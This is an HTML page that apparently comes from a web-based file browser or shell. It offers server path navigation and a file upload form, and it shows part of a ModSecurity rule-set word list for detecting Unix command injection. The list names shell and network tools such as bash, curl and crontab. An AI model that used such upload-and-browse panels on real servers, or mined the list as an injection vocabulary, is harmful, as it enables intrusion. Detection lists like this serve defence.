<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.95</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=//usr">usr</a>/<a href="?path=//usr/share">share</a>/<a href="?path=//usr/share/modsecurity-crs">modsecurity-crs</a>/<a href="?path=//usr/share/modsecurity-crs/util">util</a>/<a href="?path=//usr/share/modsecurity-crs/util/regexp-assemble">regexp-assemble</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : //usr/share/modsecurity-crs/util/regexp-assemble/regexp-932100.txt</tr></td></table><br /><pre># Word list for rule 932100 (RCE Unix command injection part 1/3)
#
# To convert to a regexp that can be pasted into the rule:
#   cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
#
# Entries starting with ' are used verbatim.
# Everything after # is a comment.
#
# To prevent some FP for a command, you can require command parameters
# after a command. Only do this if the command regularly causes FP and if
# allowing the bare command (without parameters) is not too dangerous.
# (Note: due to \b following the regexp, a word boundary is also required
# further on, so some letter/number is needed for a match). Example:
#
#   diff+

# Special regexp case for the '.' (source) command to prevent FP:
'\.\s.*

7z
7za
7zr
adduser
alias+
apt-get
arch+
arp
awk+
bash
batch+
breaksw
bsdcat
bsdiff
bsdtar
builtin
bzcat
bzdiff
bzegrep
bzfgrep
bzgrep
bzip2
bzless
bzmore
cat+
cc+
chattr
chdir+
chflags
chmod
command+
compress+
coproc
cp+
crontab
csh
curl
dash
dhclient
diff+
dmesg
doas
done
dpkg
du+
echo+
egrep
endif
endsw
env
env-update
esac
eval
exec+
expand
export
expr
fc+
fetch+
fgrep
fi
file+
filetest
find+
foreach
ftp+
ftpstats
ftpwho
function
gcc+
gdb
GET+
getfacl+
git+
grep+
gunzip
gzcat
gzip
head+
history
hostid
hostname
htdigest
htpasswd
hup+
# 'id' causes way too much FP, so we require whitespace; this will allow
# injecting ';id' unfortunately.
id+
ifconfig
ip6tables
ipconfig
iptables
irb
irb1
irb18
irb19
irb20
irb21
irb22
java+
jexec
jobs+
kill+
killall
last+
lastcomm
lastlog
lastlogin
ldconfig
ldd+
less+
lessecho
lessfile
lesspipe
lftp
lftpget
ln+
local+
locate+
logname
lp+
ls
ls-F
lsb_release
lscpu
lshw
lsmod
lsof
lspci
lsusb
lwp-download
lwp-dump
lwp-mirror
lwp-request
lynx+
lzcat
lzcmp
lzdiff
lzegrep
lzfgrep
lzgrep
lzless
lzma
lzmore
mailq
mailx+
mkdir+
mlocate
more+
</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>